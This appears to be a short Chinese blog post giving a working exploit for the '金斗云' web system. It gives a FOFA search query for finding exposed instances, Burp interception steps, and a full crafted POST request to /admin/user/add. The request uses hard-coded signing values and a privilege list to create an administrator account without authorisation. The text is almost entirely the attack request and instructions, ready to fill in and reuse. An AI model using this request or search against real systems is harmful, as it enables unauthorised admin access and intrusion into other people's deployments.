fofa搜索title="金斗云"
随便输入账号密码,打开bp抓包
替换登录的数据包,QWER处需要抓包获取,登陆时输入userCode和password,网站显示的是userName,连续发送会出现用户存在字样
POST /admin/user/add HTTP/1.1
Host: 网站ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 287
Origin: http://ip+端口
Connection: close
Referer: http://ip+端口/
Priority: u=0
{"appId":"hkmp","mchId":"hkmp","deviceId":"hkmp","timestamp":QWER,"nonce":QWER,"sign":"hkmp","data":{"userCode":"自己设置","userName":"自己设置","password":"自己设置","privilege":["1000","8000","8010","2000","2001","2010","7000"],"adminUserCode":"admin","adminUserName":"admin"}}红色部分是对应QWER值 ,是通过登录抓包获取的
尝试登陆userCode和password,成功
Comments NOTHING